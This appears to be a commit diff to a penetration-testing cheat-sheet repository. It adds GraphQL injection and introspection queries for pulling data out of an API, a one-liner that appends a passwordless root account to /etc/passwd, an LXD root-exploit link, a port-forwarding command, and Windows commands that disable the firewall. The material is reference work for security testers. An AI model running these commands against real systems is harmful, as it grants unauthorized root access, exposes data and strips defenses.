GraphQL + LXD/etc/passwd PrivEsc + Win firewall

GraphQL Injection/README.md

@@ -4,10 +4,10 @@
 
 ## Exploit
 
-Identify an injection point
+### Identify an injection point
 
-```javascript
-?param={__schema{types{name}}}
+```js
+example.com/graphql?query={__schema{types{name}}}
 ```
 Check if errors are visible
 
@@ -17,7 +17,15 @@ Check if errors are visible
 ?param={thisdefinitelydoesnotexist}
 ```
 
-Enumerate Database Schema with the following GraphQL query
+### Extract data
+
+```js
+example.com/graphql?query={TYPE_1{FIELD_1,FIELD_2}}
+```
+
+![HTB Help - GraphQL injection](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/GraphQL%20Injection/Images/htb-help.png?raw=true)
+
+### Enumerate Database Schema with the following GraphQL query
 
 ```javascript
 fragment FullType on __Type {
@@ -114,10 +122,9 @@ query IntrospectionQuery {
     }
   }
 }
-
 ```
 
-Enumerate the definition of interesting types using the following GraphQL query, replacing "User" with the chosen type
+### Enumerate the definition of interesting types using the following GraphQL query, replacing "User" with the chosen type
 
 ```javascript
 {__type (name: "User") {name fields{name type{name kind ofType{name kind}}}}}
@@ -127,4 +134,4 @@ Enumerate the definition of interesting types using the following GraphQL query,
 
 * [Introduction to GraphQL](https://graphql.org/learn/)
 * [GraphQL Introspection](https://graphql.org/learn/introspection/)
-
+* [API Hacking GraphQL - @ghostlulz - jun 8, 2019](https://medium.com/@ghostlulzhacks/api-hacking-graphql-7b2866ba1cf2)

Methodology and Resources/Linux - Privilege Escalation.md

@@ -384,6 +384,14 @@ E.g: `hacker:$1$hacker$TzyKlv0/R/c28R.GAeLw.1:0:0:Hacker:/root:/bin/bash`
 
 You can now use the `su` command with `hacker:hacker`
 
+Alternatively you can use the following lines to add a dummy user without a password.    
+WARNING: you might degrade the current security of the machine.
+
+```powershell
+echo 'dummy::0:0::/root:/bin/bash' >>/etc/passwd
+su - dummy
+```
+
 
 ## NFS Root Squashing
 
@@ -526,6 +534,8 @@ lxc start mycontainer
 lxc exec mycontainer /bin/sh
 ```
 
+Alternatively https://github.com/initstring/lxd_root
+
 ## References
 
 - [SUID vs Capabilities - Dec 7, 2017 - Nick Void aka mn3m](https://mn3m.info/posts/suid-vs-capabilities/)

Methodology and Resources/Network Pivoting Techniques.md

@@ -85,6 +85,7 @@ optional arguments:
 
 ```c
 portfwd list
+portfwd add -l 88 -p 88 -r 127.0.0.1
 portfwd add -L 0.0.0.0 -l 445 -r 192.168.57.102 -p 445
 
 or

Methodology and Resources/Windows - Privilege Escalation.md

@@ -172,6 +172,13 @@ List firewall's blocked ports
 $f=New-object -comObject HNetCfg.FwPolicy2;$f.rules |  where {$_.action -eq "0"} | select name,applicationname,localports
 ```
 
+Disable firewall
+
+```powershell
+netsh firewall set opmode disable
+netsh advfirewall set allprofiles state off
+```
+
 List all network shares
 
 ```powershell

SAML Injection/README.md

@@ -161,7 +161,7 @@ The SAML response is accepted by the service provider. Due to the vulnerability,
 
 An XSLT can be carried out by using the `transform` element.
 
-![http://sso-attacks.org/images/4/49/XSLT1.jpg](http://sso-attacks.org/images/4/49/XSLT1.jpg)
+![http://sso-attacks.org/images/4/49/XSLT1.jpg](http://sso-attacks.org/images/4/49/XSLT1.jpg)    
 Picture from [http://sso-attacks.org/XSLT_Attack](http://sso-attacks.org/XSLT_Attack)    
 
 ```xml